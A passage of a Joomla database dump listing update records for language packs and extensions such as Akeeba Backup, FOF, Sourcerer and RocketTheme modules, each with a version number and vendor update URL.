US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5035,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5036,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5037,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5038,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5039,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5040,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5041,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5042,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5043,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5044,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5045,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5046,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5047,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5048,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5049,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5050,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5051,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5052,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5053,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5054,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5055,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5056,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5057,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5058,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(5059,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5060,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5061,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5062,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5063,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5064,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5065,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5066,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5067,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5068,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5069,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5070,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5071,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5072,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5073,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5074,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5075,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5076,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5077,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5078,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5079,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5080,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5081,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5082,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5083,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5084,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5085,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5086,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5087,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5088,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5089,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5090,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5091,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5092,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5093,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5094,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5095,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5096,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5097,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5098,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5099,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5100,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5101,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5102,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5103,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5104,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5105,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5106,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5107,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5108,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5109,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5110,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5111,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5112,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5113,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5114,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5115,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5116,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5117,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5118,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5119,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5120,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5121,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5122,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5123,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5124,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5125,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5126,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5127,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5128,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5129,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5130,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5131,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5132,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5133,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5134,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5135,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5136,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5137,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5138,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5139,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5140,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5141,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5142,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5143,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5144,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5145,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5146,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5147,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5148,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5149,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5150,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5151,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5152,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5153,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5154,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5155,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5156,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5157,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5158,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5159,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5160,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5161,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5162,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5163,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(5164,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5165,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5166,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5167,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5168,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5169,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5170,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5171,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5172,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5173,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5174,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5175,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5176,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5177,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5178,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5179,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5180,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5181,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5182,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5183,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5184,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5185,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5186,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5187,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5188,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5189,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5190,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5191,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5192,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5193,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5194,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5195,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5196,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5197,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5198,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5199,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5200,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5201,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5202,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5203,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5204,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5205,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5206,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5207,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5208,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5209,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5210,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5211,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5212,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5213,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5214,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5215,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5216,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5217,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5218,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5219,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5220,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5221,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5222,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5223,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5224,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5225,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5226,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5227,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5228,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5229,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5230,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5231,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5232,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5233,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5234,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5235,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5236,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5237,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5238,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5239,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5240,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5241,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5242,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5243,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5244,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5245,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5246,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5247,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5248,57,0,'German 